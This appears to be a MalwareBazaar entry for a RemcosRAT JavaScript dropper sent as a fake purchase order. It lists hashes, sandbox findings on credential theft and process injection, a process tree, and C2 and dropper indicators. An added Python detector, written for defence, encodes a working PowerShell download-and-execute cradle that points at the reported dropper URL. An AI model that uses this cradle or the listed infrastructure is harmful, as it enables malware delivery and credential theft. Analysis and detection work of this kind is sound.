MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

RemcosRAT

Vendor detections: 11


SHA256 hash: d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac
SHA3-384 hash: 7fe69e3293c875b0d168047acff5d43d54918a1e84d6248c194e6d47b6cc22be9518e64b8ed37a22cdc08b906fd875ea
SHA1 hash: e6eb7e7ec1c975511666704c689f95f1e5878e10
MD5 hash: 73143daf27d3dac83ed42785ab4f1993
humanhash: mirror-one-autumn-three
File name: Purchase order 4504033909.js
Signature: RemcosRAT
File size: 1'234'477 bytes
First seen: 2025-12-01 06:52:35 UTC
Last seen: 2025-12-01 14:37:09 UTC
File type: Java Script (JS) js
MIME type: text/plain
ssdeep: 24:2xgNiLdz9pkHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHQ:rwrZ1NL
Threatray: 1'893 similar samples on MalwareBazaar
TLSH: T1DD4503449148B0384B776A03AF400D68AFB428291E4EC07D3D14E8D8CB7BAF861F9DF5
Magika: javascript
Reporter: lowmal3
Tags: js RemcosRAT

Intelligence


File Origin
# of uploads: 4
# of downloads: 100
Origin country: DE
Vendor Threat Intelligence

No detections

Verdict: Malicious
Score: 97.4%
Tags: ransomware xtreme shell

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: anti-vm base64 fingerprint masquerade obfuscated powershell repaired

Verdict: Malicious
Labeled as: SVM:TrojanDownloader/JS.MalBehav.gen

Verdict: Malicious
File Type: text
First seen: 2025-11-30T21:57:00Z UTC
Last seen: 2025-12-03T05:32:00Z UTC
Hits: ~10000
Detections: HEUR:Trojan.Script.Generic Trojan-Downloader.JS.SLoad.sb Trojan.JS.SAgent.sb HEUR:Trojan-Downloader.Script.SLoad.gen HEUR:Trojan-Downloader.Script.Generic HEUR:Trojan.Script.SAgent.gen
Result
Threat name:
Detection: malicious
Classification: rans.phis.troj.spyw.expl.evad
Score: 100 / 100
Signature
.NET source code contains potential unpacker
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to bypass UAC (CMSTPLUA)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates processes via WMI
Detected Remcos RAT
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Injects a PE file into foreign processes
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Remcos
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
System process connects to network (likely due to code injection or exploit)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Unusual module load detection (module proxying)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected Generic JS Downloader
Yara detected MSILDownloaderGeneric
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected WebBrowserPassView password recovery tool
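The Sigma-style signatures above (WScript or CScript Dropper, Base64 Encoded PowerShell Command, FromBase64String, Script Interpreter Execution From Suspicious Folder, Powershell download and execute) describe the execution chain reported for this sample: wscript.exe running the .js attachment, launching PowerShell with an encoded command that fetches and injects the Remcos payload. The Python below is an added example, not MalwareBazaar's or any vendor's detection code. It implements those checks over a few constructed Sysmon-style process-creation events (Image, CommandLine, ParentImage); the decoded PowerShell cradle in the constructed event reuses the dropper URL reported on this page, while the field names, suspicious-folder list and rule names are this example's own assumptions.

```python
import base64
import re
from dataclasses import dataclass

# Field names follow Sysmon Event ID 1 naming. The folder list, flag parsing
# and rule names are this example's assumptions, not a vendor's rule set.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})")
CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|invoke-expression|\biex\b")
FROM_B64 = re.compile(r"(?i)frombase64string")


@dataclass
class ProcEvent:
    image: str
    command_line: str
    parent_image: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_event(ev: ProcEvent) -> list:
    """Names of the checks that fire for one process-creation event, in rule order."""
    hits = []
    image, parent = basename(ev.image), basename(ev.parent_image)
    if parent in SCRIPT_HOSTS and image in SHELLS:
        hits.append("wscript_or_cscript_dropper")
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        hits.append("base64_encoded_powershell_command")
    # Inspect the visible command line plus the decoded payload, so cradles hidden
    # behind -EncodedCommand are still caught.
    text = ev.command_line if decoded is None else ev.command_line + "\n" + decoded
    if image in POWERSHELL and FROM_B64.search(text):
        hits.append("powershell_frombase64string")
    if image in POWERSHELL and CRADLE.search(text):
        hits.append("powershell_download_and_execute")
    if image in SCRIPT_HOSTS and any(d in ev.command_line.lower() for d in SUSPICIOUS_DIRS):
        hits.append("script_interpreter_from_suspicious_folder")
    return hits


def encode_powershell(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events mirroring the chain reported for this sample: the .js
# attachment run by wscript.exe from Temp, then wscript.exe spawning PowerShell
# with an encoded download-and-execute cradle. The third event is benign admin use.
STAGE2 = ("$b=(New-Object Net.WebClient).DownloadString('https://bvaco.com/js/panel/uploads/optimized_MSI.png');"
          "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)))")
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\Purchase order 4504033909.js"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -Enc " + encode_powershell(STAGE2),
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-Date",
              r"C:\Windows\explorer.exe"),
]


def scan(events) -> list:
    """Return [(image basename, hits)] for every event; hits is empty when nothing fired."""
    return [(basename(ev.image), check_event(ev)) for ev in events]


if __name__ == "__main__":
    for name, hits in scan(SAMPLE_EVENTS):
        print(f"{name:16} {', '.join(hits) or '-'}")
```

Decoding the encoded command before matching is the point worth taking from this sample: the visible command line only shows `-Enc <blob>`, and the download cradle and `FromBase64String` call are only visible in the decoded UTF-16LE payload. The parent/child check fires on the `wscript.exe -> powershell.exe` edge regardless of how the arguments are obfuscated, which is why it is the more robust of the two.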
Behaviour
Behavior Graph (ID 1823376; sample: Purchase order 4504033909.js; start date: 01/12/2025; architecture: WINDOWS; score: 100)

Sample-level indicators: DNS lookups for pixeldrain.com and bvaco.com; Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 21 other signatures.

Process tree, with per-process network contacts, dropped files and signatures:

powershell.exe
  network: bvaco.com 119.18.49.46:443 (source ports 49693, 49698; PUBLIC-DOMAIN-REGISTRYUS, India)
  signatures: Writes to foreign memory regions; Injects a PE file into foreign processes; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
  cmd.exe
    network: 107.175.246.37:2404 (source ports 49695, 49696; AS-COLOCROSSINGUS, United States)
    dropped: C:\Users\user\AppData\Local\Temp\THD446.tmp (MS-DOS); C:\Users\user\AppData\Local\Temp\THD196.tmp (MS-DOS); C:\Users\user\AppData\Local\Temp\THD0E9.tmp (PE32)
    signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 7 other signatures
    RmClient.exe
      signatures: Tries to steal Mail credentials (via file registry); Tries to harvest and steal browser information (history, passwords, etc); Unusual module load detection (module proxying)
    RmClient.exe
      signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
    RmClient.exe
    RmClient.exe
  cmd.exe
    dropped: C:\Users\Public\Downloads48ame_File.js (ASCII)
    conhost.exe
  conhost.exe

wscript.exe
  network: pixeldrain.com 160.202.167.164:443 (source ports 49690, 49694; DEDICATEDUS, New Zealand)
  signatures: System process connects to network (likely due to code injection or exploit); Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures

wscript.exe
  powershell.exe
    signatures: Writes to foreign memory regions; Injects a PE file into foreign processes
    cmd.exe
      signatures: Detected Remcos RAT
    conhost.exe
Verdict: inconclusive
YARA: 1 match(es)

Verdict: Malicious
Threat: Trojan-Downloader.JS.SLoad

Threat name: Win32.Trojan.Egairtigado
Status: Malicious
First seen: 2025-12-01 01:01:03 UTC
File Type: Text (JavaScript)
AV detection: 9 of 24 (37.50%)
Threat level: 5/5
Result
Malware family: n/a
Score: 10/10
Tags: execution
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Command and Scripting Interpreter: JavaScript
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Process spawned unexpected child process
Malware Config
Dropper Extraction: https://bvaco.com/js/panel/uploads/optimized_MSI.png
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Malspam (distributed via e-mail attachment)
Signature: RemcosRAT
File type: Java Script (JS) js
SHA256: d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac (this sample)

Comments